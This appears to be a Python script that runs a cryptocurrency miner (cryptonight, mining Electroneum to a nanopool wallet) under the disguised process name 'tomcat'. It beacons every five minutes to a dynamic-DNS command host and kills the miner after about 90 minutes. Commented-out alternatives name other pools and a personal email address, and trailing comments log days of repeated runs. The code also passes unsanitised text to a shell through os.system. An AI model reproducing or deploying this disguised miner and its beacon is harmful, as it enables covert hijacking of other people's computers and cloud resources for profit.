import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:22:07.287638
#2018-02-17 17:11:07.924954
#2018-02-17 18:59:07.279481
#2018-02-17 20:47:01.992511
#2018-02-17 22:34:07.012082
#2018-02-18 00:18:06.390850
#2018-02-18 02:09:01.781477
#2018-02-18 03:56:06.873899
#2018-02-18 05:44:07.363945
#2018-02-18 07:37:01.994274
#2018-02-18 09:24:01.587726
#2018-02-18 11:10:04.540535
#2018-02-18 12:57:01.845670
#2018-02-18 14:44:07.772798
#2018-02-18 16:33:02.038274
#2018-02-18 18:22:03.555947
#2018-02-18 20:07:07.376921
#2018-02-18 21:54:04.120265
#2018-02-18 23:42:02.067028
#2018-02-19 01:28:06.050583
#2018-02-19 03:16:01.317003
#2018-02-19 05:00:04.702378
#2018-02-19 06:46:02.166738
#2018-02-19 08:34:08.175632
#2018-02-19 10:23:05.547233
#2018-02-19 12:11:04.631614
#2018-02-19 13:58:07.912838
#2018-02-19 15:47:06.375630
#2018-02-19 17:36:09.262026
#2018-02-19 19:23:06.833491
#2018-02-19 21:09:05.030135
#2018-02-19 22:56:02.165582
#2018-02-20 00:40:07.384877
#2018-02-20 02:29:04.288204
#2018-02-20 04:19:01.884371
#2018-02-20 06:03:05.289549
#2018-02-20 07:48:06.446272
#2018-02-20 09:33:07.508863
#2018-02-20 11:17:08.201116
#2018-02-20 13:04:08.864040
#2018-02-20 14:49:02.192284
#2018-02-20 16:31:06.236927
#2018-02-20 18:17:09.146767
#2018-02-20 20:07:03.674316
#2018-02-20 21:53:04.760402
#2018-02-20 23:35:05.120773
#2018-02-21 01:18:01.906289
#2018-02-21 03:07:06.966208
#2018-02-21 04:53:05.896037
#2018-02-21 06:41:08.656770
#2018-02-21 08:29:06.710656
#2018-02-21 10:16:03.577280
#2018-02-21 12:04:01.997277
#2018-02-21 13:52:10.825805
#2018-02-21 15:38:02.370747
#2018-02-21 17:28:07.630767
#2018-02-21 19:15:11.243734
#2018-02-21 21:04:03.439657
#2018-02-21 22:51:01.372664
#2018-02-22 00:41:07.085973
#2018-02-22 02:28:06.107300
#2018-02-22 04:15:04.771676
#2018-02-22 06:01:07.805247
#2018-02-22 07:48:04.154702
#2018-02-22 09:36:07.886880
#2018-02-22 11:21:04.630725
#2018-02-22 13:08:01.291293
#2018-02-22 14:56:01.338986
#2018-02-22 16:41:06.577156
#2018-02-22 18:26:07.963448
#2018-02-22 20:19:01.392071
#2018-02-22 22:04:07.257877
#2018-02-22 23:50:08.496991
#2018-02-23 01:39:03.981087
#2018-02-23 03:26:06.781341
#2018-02-23 05:13:07.988874
#2018-02-23 06:57:06.704907
#2018-02-23 08:48:07.905109
#2018-02-23 11:06:07.802970
#2018-02-23 12:59:10.206510
#2018-02-23 14:45:07.780198
#2018-02-23 16:35:01.268230
#2018-02-23 18:21:04.678894
#2018-02-23 20:04:07.106896
#2018-02-23 21:48:07.147241
#2018-02-23 23:42:02.236614
#2018-02-24 01:31:05.562408
#2018-02-24 03:20:01.835504
#2018-02-24 05:06:05.254149
#2018-02-24 06:54:06.108353
#2018-02-24 08:45:02.956320
#2018-02-24 10:40:07.229148
#2018-02-24 12:26:04.585891
#2018-02-24 14:19:01.931202
#2018-02-24 16:06:05.705054
#2018-02-24 17:57:03.678012
#2018-02-24 19:44:01.612860
#2018-02-24 21:31:01.440745
#2018-02-25 00:16:07.531392
#2018-02-25 03:27:01.649423
#2018-02-25 07:15:03.989384